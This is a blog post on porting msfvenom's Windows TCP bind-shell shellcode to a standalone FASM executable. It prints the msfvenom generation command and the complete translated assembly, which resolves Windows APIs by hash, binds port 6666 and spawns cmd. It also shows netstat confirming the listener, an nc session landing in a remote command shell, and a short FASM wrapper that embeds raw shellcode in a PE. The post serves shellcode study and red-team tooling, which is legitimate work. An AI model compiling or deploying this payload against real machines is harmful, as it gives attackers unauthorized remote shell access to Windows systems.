Intro

During the last couple of weeks I started focusing more and more on windows internals and the way shellcode is crafted for the different windows platforms. There are many good windows shellcodes examples available out for grabs on the internet, but some of them are written in MASM or others are not so keen having a small memory footprint. Hence, I decided to focus on probably the best shellcode actively mantained repository: msfvenom.
We can then dump the raw assembly from msfvenom shellcode and try porting it to a standard assembler, such as FASM.

Why FASM?

  1. Has no linker –> just a single building step
  2. So compiles faster
  3. Maintained by an active community
  4. It’s cross platform.

Pick your shellcode

I have opted for the simplest tcp bindshell available in msfvenom. By redirecting the raw format to stdout we can thentrigger ndisasm to dump the x86 assembly deadlisting.

# msfvenom -p windows/shell_bind_tcp LPORT=6666 -f raw | ndisasm -u -
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 328 bytes

00000000  FC                cld
00000001  E882000000        call 0x88
00000006  60                pusha
[...snip...]
00000143  6A00              push byte +0x0
00000145  53                push ebx
00000146  FFD5              call ebp

The -u tells ndisasm to expect 32-bit mode assembly, while the - listen on stdin instead of a file.

From deadlisting to a standalone FASM

With a few syntax modifications, we could just compile the raw ndisasm assembly into a raw binary, but why not building a standalone PE that can be easily ran and tested with a debuggers?

First, we need to translate the following syntax and constructs.

Examples:

ndisasm:                   FASM:
-----------------          -----------------
push byte +0x8             push 0x8
jl 0x143                   jl sub6   ; label 'sub6'  created at offset 0x143
loop 0x1e                  loop loop1; label 'loop1' created at offset 0x1e
call 0x8                   call first; label 'first' created at offset 0x8

The bottom line is that we should remove all the hardcoded relative addressing and replace them with labels.

Finally, we need a proper header, so that the assembler will generate a proper PE with all the bells and whistles.

format PE console
use32

Time to test

Here is the resulting shellcode, after all the syntax translations and labelling,

format PE console
use32
entry start

start:
;find kernel32
call first
pusha
mov ebp,esp
xor eax,eax
mov edx,[fs:eax+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
sub5:
    mov esi,[edx+0x28]
    movzx ecx,word [edx+0x26]
    xor edi,edi
loop1: lodsb
    cmp al,0x61
    jl sub7
    sub al,0x20
sub7:
    ror edi,byte 0xd
    add edi,eax
loop loop1
push edx
push edi
mov edx,[edx+0x10]
mov ecx,[edx+0x3c]
mov ecx,[ecx+edx+0x78]
jecxz sub1
add ecx,edx
push ecx
mov ebx,[ecx+0x20]
add ebx,edx
mov ecx,[ecx+0x18]
sub4:
    jecxz sub2
    dec ecx
    mov esi,[ebx+ecx*4]
    add esi,edx
    xor edi,edi
sub3:
    lodsb
    ror edi,byte 0xd
    add edi,eax
    cmp al,ah
    jnz sub3
    add edi,[ebp-0x8]
    cmp edi,[ebp+0x24]
    jnz sub4
    pop eax
    mov ebx,[eax+0x24]
    add ebx,edx
    mov cx,[ebx+ecx*2]
    mov ebx,[eax+0x1c]
    add ebx,edx
    mov eax,[ebx+ecx*4]
    add eax,edx
    mov [esp+0x24],eax
    pop ebx
    pop ebx
    popa
    pop ecx
    pop edx
    push ecx
    jmp eax
sub2:
    pop edi
sub1:
    pop edi
    pop edx
    mov edx,[edx]
    jmp short sub5

first: pop ebp
    push dword 0x3233
    push dword 0x5f327377
    push esp
    push dword 0x726774c
    call ebp
    mov eax,0x190
    sub esp,eax
    push esp
    push eax
    push dword 0x6b8029
    call ebp
    push 0x8
    pop ecx

 loop2:
    push eax
    loop loop2

    inc eax
    push eax
    inc eax
    push eax
    push dword 0xe0df0fea
    call ebp
    xchg eax,edi
    push dword 0xa1a0002 ; port 6666: 1a0a AF_INET:2
    mov esi,esp
    push 0x10
    push esi
    push edi
    push dword 0x6737dbc2
    call ebp
    push edi
    push dword 0xff38e9b7
    call ebp
    push edi
    push dword 0xe13bec74
    call ebp
    push edi
    xchg eax,edi
    push dword 0x614d6e75
    call ebp
    push dword 0x646d63
    mov ebx,esp
    push edi
    push edi
    push edi
    xor esi,esi
    push 0x12
    pop ecx
loop3:
    push esi
    loop loop3
    mov word [esp+0x3c],0x101
    lea eax,[esp+0x10]
    mov byte [eax],0x44
    push esp
    push eax
    push esi
    push esi
    push esi
    inc esi
    push esi
    dec esi
    push esi
    push esi
    push ebx
    push esi
    push dword 0x863fcc79
    call ebp
    mov eax,esp
    dec esi
    push esi
    inc esi
    push dword [eax]
    push dword 0x601d8708
    call ebp
    mov ebx,0x56a2b5f0
    push dword 0x9dbd95a6
    call ebp
    cmp al,0x6
    jl sub6
    cmp bl,0xe0
    jnz sub6
    mov ebx,0x6f721347
sub6:
    push 0x0
    push ebx
    call ebp

We can now compile&run and verify that we have a listening port.

C:\Windows\system32>netstat -ano | find "6666"
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       6796

And a reachable shell

matteo-mbp:~ matteo$ nc 172.16.165.220 6666
Microsoft Windows [Version 10.0.18362.113]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\matteo\Desktop>

As my great colleague Stian Jahr pointend out, there is a simpler way to achieve all of the above, just with a simple fasm script :)

include 'win32ax.inc' ; you can simply switch between win32ax, win32wx, win64ax and win64wx here
.code
  start:
       file "shellcode.bin" ;
.end start